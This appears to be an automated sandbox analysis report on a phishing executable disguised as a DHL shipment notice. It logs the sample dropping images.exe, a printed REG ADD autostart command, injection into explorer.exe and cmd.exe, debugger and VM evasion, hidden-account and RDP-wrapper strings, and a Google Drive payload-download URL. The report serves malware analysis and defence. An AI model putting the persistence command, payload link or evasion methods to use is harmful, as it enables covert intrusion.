Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_004070A2 push 3E0AA415h; retf
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_00403976 pushfd ; ret
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022826FB push eax; iretd
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_02284C6D push eax; iretd
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022810E0 push es; retf 55A4h
Source: C:\ProgramData\images.exe	Code function: 21_2_00406464 push edx; iretd
Source: C:\ProgramData\images.exe	Code function: 21_2_0040A07F push ds; iretd
Source: C:\ProgramData\images.exe	Code function: 21_2_004070A2 push 3E0AA415h; retf
Source: C:\ProgramData\images.exe	Code function: 21_2_00403976 pushfd ; ret
Source: C:\ProgramData\images.exe	Code function: 21_2_022826FB push eax; iretd
Source: C:\ProgramData\images.exe	Code function: 21_2_02284C6D push eax; iretd
Source: C:\ProgramData\images.exe	Code function: 21_2_022810E0 push es; retf 55A4h

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File created: C:\ProgramData\images.exe

Jump to dropped file

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File created: C:\ProgramData\images.exe

Jump to dropped file

Boot Survival:

Creates an undocumented autostart registry key

Show sources

Source: C:\Windows\SysWOW64\reg.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Load

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Contains functionality to hide user accounts

Show sources

Source: DHL Express shipment notification.exe, 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DHL Express shipment notification.exe, 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: DHL Express shipment notification.exe, 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DHL Express shipment notification.exe, 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: DHL Express shipment notification.exe, 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: DHL Express shipment notification.exe, 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: images.exe, 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: images.exe, 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: images.exe, 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: images.exe, 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
Source: images.exe, 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: images.exe, 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp	String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

File opened: C:\ProgramData\images.exe:Zone.Identifier read attributes | delete

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\images.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\ProgramData\images.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\ProgramData\images.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\ProgramData\images.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\ProgramData\images.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: DHL Express shipment notification.exe, 00000005.00000002.740302767.0000000002430000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1170610776.0000000002A20000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSHTML.DLL
Source: DHL Express shipment notification.exe, 0000000E.00000002.1022206078.0000000003310000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1WMEKQGVHTBFHUC179QEYSF4NUF_7RF9G
Source: DHL Express shipment notification.exe, 00000005.00000002.740302767.0000000002430000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022206078.0000000003310000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1170610776.0000000002A20000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe TID: 1548	Thread sleep count: 70 > 30
Source: C:\ProgramData\images.exe TID: 2660	Thread sleep count: 70 > 30
Source: C:\ProgramData\images.exe TID: 3252	Thread sleep count: 364 > 30
Source: C:\ProgramData\images.exe TID: 3252	Thread sleep time: -364000s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 2592	Thread sleep count: 3901 > 30
Source: C:\Windows\SysWOW64\cmd.exe TID: 2592	Thread sleep time: -46812000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Code function: 5_2_02293692 rdtsc

Source: C:\ProgramData\images.exe	Window / User API: threadDelayed 364
Source: C:\Windows\SysWOW64\cmd.exe	Window / User API: threadDelayed 3901

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

System information queried: ModuleInformation

Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: DHL Express shipment notification.exe, 0000000E.00000002.1022206078.0000000003310000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1wMeKQgvhtbFhUc179qeysF4NuF_7Rf9g
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: DHL Express shipment notification.exe, 0000000E.00000002.1021014003.00000000019A3000.00000004.00000020.sdmp, explorer.exe, 0000000F.00000000.936184682.000000000DA04000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.987848818.000000000DA04000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5701113978.000000000D7F0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.985595787.000000000D7F0000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703739308.000000000DA04000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.934050366.000000000D7F0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: DHL Express shipment notification.exe, 0000000E.00000002.1020504850.0000000001947000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWH
Source: DHL Express shipment notification.exe, 00000005.00000002.740302767.0000000002430000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022206078.0000000003310000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1170610776.0000000002A20000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: explorer.exe, 0000000F.00000000.987347269.000000000D995000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.935700971.000000000D995000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5703169506.000000000D995000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW`
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: DHL Express shipment notification.exe, 00000005.00000002.741442541.0000000002DA9000.00000004.00000001.sdmp, DHL Express shipment notification.exe, 0000000E.00000002.1022285511.00000000033D9000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: images.exe, 00000015.00000002.1171933983.0000000002D59000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat
Source: DHL Express shipment notification.exe, 00000005.00000002.740302767.0000000002430000.00000004.00000001.sdmp, images.exe, 00000015.00000002.1170610776.0000000002A20000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Thread information set: HideFromDebugger
Source: C:\ProgramData\images.exe	Thread information set: HideFromDebugger
Source: C:\ProgramData\images.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Code function: 5_2_02293692 rdtsc

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_02292A85 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_02291E86 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_0228CF89 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Code function: 5_2_022949D1 mov eax, dword ptr fs:[00000030h]
Source: C:\ProgramData\images.exe	Code function: 21_2_02292A85 mov eax, dword ptr fs:[00000030h]
Source: C:\ProgramData\images.exe	Code function: 21_2_02291E86 mov eax, dword ptr fs:[00000030h]
Source: C:\ProgramData\images.exe	Code function: 21_2_0228CF89 mov eax, dword ptr fs:[00000030h]
Source: C:\ProgramData\images.exe	Code function: 21_2_022949D1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 39_2_00D2001A mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process queried: DebugPort
Source: C:\ProgramData\images.exe	Process queried: DebugPort
Source: C:\ProgramData\images.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe

Code function: 5_2_02296860 RtlAddVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory written: C:\Windows\explorer.exe base: 33370000
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory written: C:\Windows\explorer.exe base: 134B0000
Source: C:\ProgramData\images.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D20000
Source: C:\ProgramData\images.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 3200000

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory allocated: C:\Windows\explorer.exe base: 134B0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory allocated: C:\Windows\explorer.exe base: 33370000 protect: page execute and read and write
Source: C:\ProgramData\images.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: D20000 protect: page execute and read and write
Source: C:\ProgramData\images.exe	Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 3200000 protect: page read and write

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory written: PID: 4856 base: 33370000 value: 58
Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Memory written: PID: 4856 base: 134B0000 value: E8

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\ProgramData\images.exe

Thread created: C:\Windows\SysWOW64\cmd.exe EIP: D2010E

Source: C:\Users\user\Desktop\DHL Express shipment notification.exe	Process created: C:\Users\user\Desktop\DHL Express shipment notification.exe "C:\Users\user\Desktop\DHL Express shipment notification.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Source: C:\ProgramData\images.exe	Process created: C:\ProgramData\images.exe C:\ProgramData\images.exe

Source: explorer.exe, 0000000F.00000002.5662011236.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.913539334.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.963175215.00000000012A1000.00000002.00020000.sdmp, cmd.exe, 00000027.00000002.5658946366.0000000003B71000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000F.00000000.918325198.0000000004840000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000002.5662011236.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.981394432.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.913539334.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.963175215.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000002.5696107995.000000000D366000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.930505618.000000000D366000.00000004.00000001.sdmp, cmd.exe, 00000027.00000002.5658946366.0000000003B71000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000F.00000002.5662011236.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.913539334.00000000012A1000.00000002.00020000.sdmp, explorer.exe, 0000000F.00000000.963175215.00000000012A1000.00000002.00020000.sdmp, cmd.exe, 00000027.00000002.5658946366.0000000003B71000.00000002.00020000.sdmp	Binary or memory string: Progman
